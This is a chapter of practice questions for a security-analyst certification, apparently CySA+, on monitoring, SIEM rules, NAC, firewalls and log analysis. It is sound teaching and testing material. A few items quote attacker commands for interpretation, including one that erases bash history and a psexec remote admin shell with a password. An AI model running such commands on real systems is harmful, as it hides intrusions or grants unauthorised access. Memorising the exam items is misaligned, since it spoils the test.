Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Chapter 3
Domain 3.0: Security Operations and Monitoring

EXAM OBJECTIVES COVERED IN THIS CHAPTER:

3.1 Given a scenario, analyze data as part of security monitoring activities.
- Heuristics
- Trend analysis
- Network
- Log review
- Impact analysis
- Security information and event management (SIEM) review
- Query writing
- Email analysis
3.2 Given a scenario, implement configuration changes to existing controls to improve security.
- Permissions
- Whitelisting
- Blacklisting
- Firewall
- Intrusion prevention system (IPS) rules
- Data loss prevention (DLP)
- Endpoint detection and response (EDR)
- Network access control (NAC)
- Sinkholing
- Malware signatures
- Sandboxing
- Port security
3.3 Explain the importance of proactive threat hunting.
- Establishing a hypothesis
- Profiling threat actors and activities
- Threat hunting tactics
- Reducing the attack surface area
- Bundling critical assets
- Attack vectors
- Integrated intelligence
- Improving detection capabilities
3.4 Compare and contrast automation concepts and technologies.
- Workflow orchestration
- Scripting
- Application programming interface (API) integration
- Automated malware signature creation
- Data enrichment
- Threat feed combination
- Machine learning
- Use of automation protocols and standards
- Continuous integration
- Continuous deployment/delivery

James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?
1. The malware is polymorphic and is being identified as multiple viruses because it is changing.
2. Different antimalware engines call the same malware package by different names.
3. VirusTotal has likely misidentified the malware package, and this is a false positive.
4. The malware contains multiple malware packages, resulting in the matches.
Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface?
1. MemCheck
2. Performance Monitor
3. WinMem
4. Top
Abul wants to identify typical behavior on a Windows 10 system using a built-in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real-time and performance over a period of time?
1. sysmon
2. sysgraph
3. resmon
4. resgraph
The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?
1. Calculating minimum viable signature length
2. Binary fingerprinting to identify the malware author
3. Building a similarity graph of similar functions across binaries
4. Heuristic code analysis of development techniques
How is integrated intelligence most commonly used in a firewall system?
1. The firewall searches for new IPs to block and creates a STIX feed entry.
2. The intelligence feed provides firewall rules that are implemented on the firewall in real time.
3. Threat intelligence is used to provide IP information for rules.
4. Named threat actors are blocked based on their threat level and resource model.
What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?
1. A scripted application installation
2. Remote execution of code
3. A scripted application uninstallation
4. A zero-day attack
Ben is reviewing network traffic logs and notices HTTP and HTTPS traffic originating from a workstation. What TCP ports should he expect to see this traffic sent to under most normal circumstances?
1. 80 and 443
2. 22 and 80
3. 80 and 8088
4. 22 and 443
Use this scenario for questions 8–10.

Lucy is an SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.
While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?
1. Heuristic
2. Behavior
3. Availability
4. Anomaly
After her discovery in the previous question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudo-code as follows:

Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.

The average administrator at Lucy's organization is responsible for 150–300 machines.

What danger does Lucy's alert create?
1. A DDoS that causes administrators to not be able to access systems
2. A network outage
3. Administrators may ignore or filter the alerts
4. A memory spike
Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?
1. Trend
2. Availability
3. Heuristic
4. Behavior
Disabling unneeded services is an example of what type of activity?
1. Threat modeling
2. Incident remediation
3. Proactive risk assessment
4. Reducing the threat attack surface area
Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?
1. A NetBIOS file share
2. A RADIUS connection
3. An RDP connection
4. A Kerberos connection
Angela wants to prevent buffer overflow attacks on a Windows system. What two built-in technologies should she consider?
1. The memory firewall and the stack guard
2. ASLR and DEP
3. ASLR and DLP
4. The memory firewall and the buffer guard
Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model?
1. 802.1x
2. DMARC
3. SPF
4. 802.3
Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?
1. The sudoers file
2. /var/log/sudo
3. /var/log/auth.log
4. root's .bash_log
When Pete connects to his organization's network, his PC runs the NAC software his systems administrator installed. The software communicates to the edge switch he is plugged into, which validates his login and system security state. What type of NAC solution is Pete using?
1. Agent-based, in-band
2. Agentless, in-band
3. Agent-based, out-of-band
4. Agentless, out-of-band
What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?
1. How often the directory is accessed
2. If files in the directory have changed
3. If sensitive data was copied out of the directory
4. Who has viewed files in the directory
While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?
```
psexec \10.0.11.1 -u Administrator -p examplepw cmd.exe 
```
1. The user has opened a command prompt on their workstation.
2. The user has opened a command prompt on the desktop of a remote workstation.
3. The user has opened an interactive command prompt as administrator on a remote workstation.
4. The user has opened a command prompt on their workstation as Administrator.
Brian writes a Snort rule that reads
```
Alert tcp any -> 10.10.11.0/24 3306 
```
What type of traffic will he detect?
1. MySQL traffic
2. RDP traffic
3. LDAP traffic
4. BGP traffic
What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators?
1. An IPS
2. UEBA
3. An IDS
4. DMARC
Sadiq wants to deploy an IPS at a network location that will maximize its impact while avoiding unnecessary load. If he wants to place it near the network border shown in the following image, where should he place it?
1. Point A
2. Point B
3. Point C
4. Point D
While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening?
1. A firewall is blocking connections from occurring
2. An IPS is blocking connections from occurring
3. A SYN flood
4. An ACK blockage
While reviewing Windows event logs for a Windows 10 system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
1. The system was shut down.
2. Another antivirus program has interfered with the scan.
3. The user disabled the scan.
4. The scan found a file it was unable to scan.
Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?
1. Blacklisting
2. IP reputation
3. Whitelisting
4. Domain reputation
Gabby executes the following command. What is she doing?
```
ps -aux | grep apache2 | grep root 
```
1. Searching for all files owned by root named apache2
2. Checking currently running processes with the word apache2 and root both appearing in the output of top
3. Shutting down all apache2 processes run by root
4. There is not enough information to answer this question.
While reviewing email headers, Saanvi notices an entry that reads:
From: “John Smith, CIO” <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11].

Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?
1. John Smith's email was forwarded by someone at demo.com.
2. John Smith's email was sent to someone at demo.com.
3. The headers were forged to make it appear to have come from John Smith.
4. The mail.demo.com server is a trusted email forwarding partner for example.com.
Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it?
1. Spoofing MAC addresses
2. Providing valid credentials
3. Spoofing IP addresses
4. Providing fake credentials
Fiona wants to prevent email impersonation of individuals inside her company. What technology can help prevent this?
1. IMAP
2. SPF
3. DKIM
4. DMARC
Which of the items from the following list is not typically found in an email header?
1. Sender IP address
2. Date
3. Receiver IP address
4. Private key
Questions 30–32 refer to the following scenario:

Chris is troubleshooting the firewall rulebase that appears here:
Users are reporting that inbound mail is not reaching their accounts. Chris believes that rule 1 should provide this access. The organization's SMTP server is located at 10.15.1.1. What component of this rule is incorrect?
1. Protocol
2. Source port
3. Destination IP
4. Destination port
The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong?
1. The protocol is incorrect.
2. The rules are misordered.
3. The source port is not specified.
4. There is no error in the rule, and Chris should check for other issues.
Rule 4 is designed to allow SSH access from external networks to the server located at 10.15.1.3. Users are reporting that they cannot access the server. What is wrong?
1. The protocol is incorrect.
2. The rules are misordered.
3. The destination port is incorrect.
4. There is no error in the rule, and Chris should check for other issues.
Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested?
1. Install host firewalls on the systems
2. Move to a NAT environment
3. Install an IPS
4. None of the above
The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?
1. The threat actor
2. The targeting method
3. The attack vector
4. The organizational weakness
Manish is using a NAC system and wants to allow users who do not meet admission requirements to patch their machines. What technique should he use to allow this?
1. Deny access to the network and require users to connect to a different network to patch before they reconnect
2. Build a quarantine network that allows access to update sites and tools
3. Deny all access and contact tech support to patch the system
4. Allow access and force a reboot after patching
Lisa is aware that multiple members of her organization fell for a phishing attack. What attack vector should she worry about based on this?
1. Compromised credentials
2. Malicious insiders
3. Ransomware
4. Brute-force
Matt believes that developers in his organization deployed code that did not implement cookies in a secure way. What type of attack would be aided by this security issue?
1. SQL injection
2. A denial-of-service attack
3. Session hijacking
4. XSS
What type of attack is a back-off algorithm intended to limit or prevent?
1. Denial-of-service attacks
2. Brute-force attacks
3. Compromised credential-based attacks
4. Trojans
Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources?
1. STIX and TAXII
2. SAML and OCSP
3. STIX and CAB
4. SAML and TAXII
Cassandra is documenting a threat actor using the STIX 2.0 standard, and she describes the threat actor as wanting to steal nuclear research data. What type of label would this receive in the STIX taxonomy?
1. An alias
2. A goal
3. Their sophistication
4. Their resource level
Jamal wants to leverage a framework to improve his threat hunting for network defense. What threat hunting framework should he select to help his team categorize and analyze threats more effectively?
1. MOPAR
2. CVSS
3. MITRE ATT&CK
4. CAPEC
Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements?
1. Whitelisting
2. Port Security
3. NAC
4. EAP

During a log review, Mei sees repeated firewall entries as shown here:

Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src
outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by 
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src
outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src
outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by 
access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src
outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by 
access-group "OUTSIDE" [0x5063b82f, 0x0]

What service is the remote system most likely attempting to access?

H.323
SNMP
MS-SQL
Oracle

While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?
1. A packer
2. A crypter
3. A shuffler
4. A protector

While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP. What should Nara report has occurred?

[ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0

A denial-of-service attack
A vulnerability scan
A port scan
A directory traversal attack

Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where in the following image should she add a rule intended to block this type of traffic?
1. The firewall
2. The router
3. The distribution switch
4. The Windows 2019 server

The Snort IPS that Adam has configured includes a rule that reads

alert tcp $EXTERNAL_NET any -> 10.0.10.0/24 80
(msg:"Alert!";
content:"http|3a|//www.example.com/download.php"; nocase;
offset:12; classtype: web-application-activity;sid:5555555; rev:1;)

What type of detection method is Adam using?

Anomaly-based
Trend-based
Availability-based
Behavioral-based

A system that Carlos is responsible for has been experiencing consistent denial of service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem?
1. IP-based blacklisting
2. Dropping all SYN packets
3. Using a connection rate or volume-limiting filter per IP
4. Using a route-blocking filter that analyzes common LOIC routes
Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity?
1. Prepare
2. Engage
3. Presence
4. Effect
Cormac needs to lock down a Windows workstation that has recently been scanned using nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections?
1. 80, 135, 139, and 445
2. 80, 445, and 3389
3. 135, 139, and 445
4. No ports should be open.
Frank's team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team?
```
select * from network-events where data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process. action = 'launch'
```
1. Processes other than explorer.exe typically do not launch command prompts.
2. cmd.exe should never launch explorer.exe.
3. explorer.exe provides administrative access to systems.
4. cmd.exe runs as administrator by default when launched outside of Explorer.
During Cormac's configuration of his organization's network access control policies, he sets up client OS rules that include the following statements:
```
ALLOW Windows 7 version *, Windows 10 version *
ALLOW OSX version *
ALLOW iOS 8.1, iOS 9 version *
ALLOW Android 7.* 
```
After deploying this rule, he discovers that many devices on his network cannot connect. What issue is most likely occurring?
1. Insecure clients
2. Incorrect NAC client versions
3. OS version mismatch
4. Patch level mismatch
Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as?
1. DNS masquerading
2. DNS sinkholing
3. DNS re-sequencing
4. DNS hierarchy revision
Maria is an Active Directory domain administrator for her company, and she knows that a quickly spreading botnet relies on a series of domain names for command and control, and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems?
1. Force a BGP update
2. Set up a DNS sinkhole
3. Modify the hosts file
4. Install an antimalware application

While analyzing a malware package, Ryan finds a list of hostnames shown here:

earnestnessrealsitetest.com
rvcxestnessrealsitetest.com
hjbtestnessrealsitetest.com
agekestnessrealsitetest.com
sgjxestnessrealsitetest.com
igjyestnessrealsitetest.com
zxahestnessrealsitetest.com
zfrpestnessrealsitetest.com
hdquestnessrealsitetest.com
umcuestnessrealsitetest.com
hrbyestnessrealsitetest.com
ysrtestnessrealsitetest.com
kgteestnessrealsitetest.com
hfsnestnessrealsitetest.com
njxfestnessrealsitetest.com

What has he likely found in the malware package?

A RPG
A DGA
A SPT
A FIN

Mark writes a script to pull data from his security data repository. The script includes the following query:

select source.name, data.process.cmd, count(*) AS hostcount
from windows-events where type = 'sysmon' AND 
data.process.action = 'launch' AND data.process. image.file =
'reg.exe' AND data.process.parentImage.file = 'cmd.exe'

He then queries the returned data using the following script:

select source.name, data.process.cmd, count(*) AS hostcount
from network-events where type = 'sysmon' AND
data.process.action = 'launch' AND data.process. image.file =
'cmd.exe' AND data.process.parentImage.file = 'explorer.exe'

What events will Mark see?

Uses of explorer.exe where it is launched by cmd.exe
Registry edits launched via the command line from Explorer
Registry edits launched via explorer.exe that modify cmd.exe
Uses of cmd.exe where it is launched by reg.exe

Chris operates the point-of-sale (POS) network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the POS terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Chris's best option to stay compliant with PCI DSS and protect his vulnerable systems?
1. Replace the Windows embedded point of sale terminals with standard Windows systems
2. Build a custom operating system image that includes the patch
3. Identify, implement, and document compensating controls
4. Remove the POS terminals from the network until the vendor releases a patch
Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?
1. Enable host firewalls
2. Install patches for those services
3. Turn off the services for each appliance
4. Place a network firewall between the devices and the rest of the network
Michelle runs the following grep command. What text will it match?
```
grep -i example *.txt 
```
1. All text files in the current directory with the word example in it
2. All occurrences of the text example in all files in the current directory with a .txt extension
3. All occurrences of the lowercase text example in all files in the current directory with a .txt extension
4. All TXT files with a filename including the word example in the current directory and all subdirectories
Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection?
1. TLS
2. VPN
3. DLP
4. FDE
Deepa wants to see the memory utilization for multiple Linux processes all at once. What command should she run?
1. top
2. ls -mem
3. mem
4. memstat
Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort?
1. Implement logging
2. Validate all inputs
3. Parameterize queries
4. Error and exception handling
Latisha wants to ensure that BYOD workstations that connect to her network meet specific minimum operating system patch level requirements. She also wants to place them into the correct VLAN for the user group that the logged-in user belongs to. She is deploying her solution to an existing, complex network. What solution should she recommend?
1. Agent-based, in-line NAC
2. Agentless, in-line NAC
3. Agent-based, out-of-band NAC
4. Agentless, out-of-band NAC
Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this?
1. Group Policy Object
2. Organizational unit
3. Active Directory forest
4. Domain controller
Eric wants to send an email using a digital signature to ensure that the recipient can prove that the email was sent by him and that the content has not changed. What technology is frequently used for this?
1. S/MIME
2. IMAP
3. DKIM
4. TLS

Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C; which set of commands will accomplish this?

Schematic illustration of setting up a Linux ip tables-based firewall rule set to prevent access from host A and B.

# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW

# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW

# iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP

# iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW

Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11?
1. iptables -A OUTPUT -d 10.24.31.11 -j DROP
2. iptables -A INPUT -d 10.24.31.11 -j ADD
3. iptables -block -host 10.24.31.11 -j DROP
4. iptables -block -ip 10.24.31.11 -j ADD
Use the following scenario and image to answer questions 68–70.

While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the information shown in the following image:
What issue should Amanda report to the system administrator?
1. High network utilization
2. High memory utilization
3. Insufficient swap space
4. High CPU utilization
What command could Amanda run to find the process with the highest CPU utilization if she did not have access to htop?
1. ps
2. top
3. proc
4. load
What command can Amanda use to terminate the process?
1. term
2. stop
3. end
4. kill
What type of attack does a network administrator need to be aware of when deploying port security?
1. MAC address spoofing
2. IP address spoofing
3. Denial-of-service attacks
4. ARP spoofing
Piper wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?
1. #iptables-policy INPUT DROP
2. #iptables-policy SERVICE DROP
3. #iptables-policy OUTPUT DROP
4. #iptables-policy FORWARD DROP
Syd inputs the following command on a Linux system:
```
#echo 127.0.0.1 example.com>> /etc/hosts 
```
What has she done?
1. She has added the system to the allowed hosts file.
2. She has routed traffic for the example.com domain to the local host.
3. She has routed local host traffic to example.com.
4. She has overwritten the hosts file and will have deleted all data except this entry.
While reviewing output from the netstat command, John sees the following output. What should his next action be?
```
[minesweeper.exe]
  TCP    127.0.0.1:62522        dynamo:0      LISTENING
[minesweeper.exe]
TCP    192.168.1.100        151.101.2.69:https  ESTABLISHED
```
1. Capture traffic to 151.101.2.69 using Wireshark
2. Initiate the organization's incident response plan
3. Check to see if 151.101.2.69 is a valid Microsoft address
4. Ignore it; this is a false positive.
What does EDR use to capture data for analysis and storage in a central database?
1. A network tap
2. Network flows
3. Software agents
4. Hardware agents
While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured:
```
ln /dev/null ~/.bash_history 
```
What action was this user attempting to perform?
1. Enabling the Bash history
2. Appending the contents of /dev/null to the Bash history
3. Logging all shell commands to /dev/null
4. Allowing remote access from the null shell
Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this?
1. Reviewing the Message-ID to see if it has been incremented
2. Checking for the In-Reply-To field
3. Checking for the References field
4. You cannot determine if a message was forwarded by analyzing the headers.
While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?
1. Continue to search for other changes
2. Run diff against the password file
3. Immediately change her password
4. Check the passwd binary against a known good version
Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques it not commonly used for legitimate purposes too?
1. Scheduled tasks
2. Service replacement
3. Service creation
4. Autostart registry keys
Matt is reviewing a query that his team wrote for their threat hunting process. What will the following query warn them about?
```
select timeInterval(date, '4h'), `data.login.user`,
count(distinct data.login.machine.name) as machinecount from
network-events where data.winevent.EventID = 4624 having 
machinecount> 1
  
```
1. Users who log in more than once a day
2. Users who are logged in to more than one machine within four hours
3. Users who do not log in for more than four hours
4. Users who do not log in to more than one machine in four hours
Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?
1. grep
2. more
3. less
4. strings
Which of the following is not a limitation of a DNS sinkhole?
1. They do not work on traffic sent directly to an IP address.
2. They do not prevent malware from being executed.
3. They can be bypassed using a hard-coded DNS server.
4. They cannot block drive-by-download attempts.

Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.

root       507  0.0  0.1 258268  3288 ?        Ssl  15:52   0:00 /usr/sbin/rsyslogd -n
message+   508  0.0  0.2  44176  5160 ?        Ss   15:52   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root       523  0.0  0.3 281092  6312 ?        Ssl  15:52   0:00 /usr/lib/accountsservice/accounts-daemon
root       524  0.0  0.7 389760 15956 ?        Ssl  15:52   0:00 /usr/sbin/NetworkManager --no-daemon
root       527  0.0  0.1  28432  2992 ?        Ss   15:52   0:00 /lib/systemd/systemd-logind
apache      714  0.0  0.1  27416  2748 ?        Ss   15:52   0:00 /www/temp/webmin
root       617  0.0  0.1  19312  2056 ?        Ss   15:52   0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root       644  0.0  0.1 245472  2444 ?        Sl   15:52   0:01 /usr/sbin/VBoxService
root       653  0.0  0.0  12828  1848 tty1     Ss+  15:52   0:00 /sbin/agetty --noclear tty1 linux
root       661  0.0  0.3 285428  8088 ?        Ssl  15:52   0:00 /usr/lib/policykit-1/polkitd --no-debug
root       663  0.0  0.3 364752  7600 ?        Ssl  15:52   0:00 /usr/sbin/gdm3
root       846  0.0  0.5 285816 10884 ?        Ssl  15:53   0:00 /usr/lib/upower/upowerd
root       867  0.0  0.3 235180  7272 ?        Sl   15:53   0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+   877  0.0  0.2  46892  4816 ?        Ss   15:53   0:00 /lib/systemd/systemd --user
Debian-+   878  0.0  0.0  62672  1596 ?        S    15:53   0:00 (sd-pam)

What is the Security Content Automation Protocol used for?
1. Assessing configuration compliance
2. Testing for sensitive data in transit
3. Testing for sensitive data at rest
4. Assessing threat levels
Damian has discovered that systems throughout his organization have been compromised for over a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?
1. Criminal
2. Hacktivist
3. APT
4. Unknown

While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?

root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/
K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::

The root account has been compromised.
An account named daemon has been added.
The shadow password file has been modified.
/etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing?

ICMP "Echo request"
Date flow start  Duration        Proto        Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.6:8.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.6:0->10.1.1.1:0.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.7:8.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.7:0->10.1.1.1:0.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.8:8.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.8:0->10.1.1.1:0.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.9:8.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.9:0->10.1.1.1:0.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.10:8.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.10:0->10.1.1.1:0.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.1.1.1:0->10.2.2.6:11.0    11      924      1
2019-07-11 04:58:59.518   10.000 ICMP  10.2.2.11:0->10.1.1.1:0.0    11      924      1

A port scan
A failed three-way handshake
A ping sweep
A traceroute

Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this?
1. CSV
2. Flat file
3. API
4. Email
Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email-based attacks?
1. The email's headers
2. Embedded links in the email
3. Attachments to the email
4. The email signature block

While reviewing NetFlows for a system on her network, Alice discovers the following traffic pattern. What is occurring?

Date flow start   Duration Proto    Src IP Addr:Port->Dst IP Addr:Port   Packets   Bytes Flows
2019-07-11        04:59:32.934  0.000 TCP     10.1.1.1:34543->10.2.2.6:22      160    1 
2019-07-11        04:59:39.730  0.000 TCP      10.1.1.1:34544->10.2.2.7:22 160    1 
2019-07-11        04:59:46.166  0.000 TCP      10.1.1.1:34545->10.2.2.8:22 160    1 
2019-07-11        04:59:52.934  0.000 TCP      10.1.1.1:34546->10.2.2.9:22      160    1 
2019-07-11        05:00:06.710  0.000 TCP      10.1.1.1:34547->10.2.2.10:22160    1 
2019-07-11        05:00:46.160  0.000 TCP      10.1.1.1:34548->10.2.2.11:22160    1 
2019-07-11        05:01:32.834  0.000 TCP      10.1.1.1:34549->10.2.2.12:22     160    1 
2019-07-11        05:01:39.430  0.000 TCP      10.1.1.1:34550->10.2.2.13:22160    1 
2019-07-11        05:01:46.676  0.000 TCP      10.1.1.1:34551->10.2.2.14:22160    1

A telnet scan
An SSH scan
An SSH scan with unsuccessful connection attempts
An SFTP scan with unsuccessful connection attempts

Ric is working on reverse-engineering a malware sample and wants to run the binary but also control the execution as it occurs. What type of tool should he select for this?
1. A disassembler
2. A decompiler
3. A debugger
4. An unpacker
Jennifer wants to search for terms including “CySA+” and all other variations of the text regardless of which letters may be capitalized. Which of the following commands will find all the terms that match what she is searching for in a text file named example.txt?
1. grep -i cysa+ example.txt
2. grep -uc CySA+ example.txt
3. grep -case cysa+ example.txt
4. grep example.txt cysa+
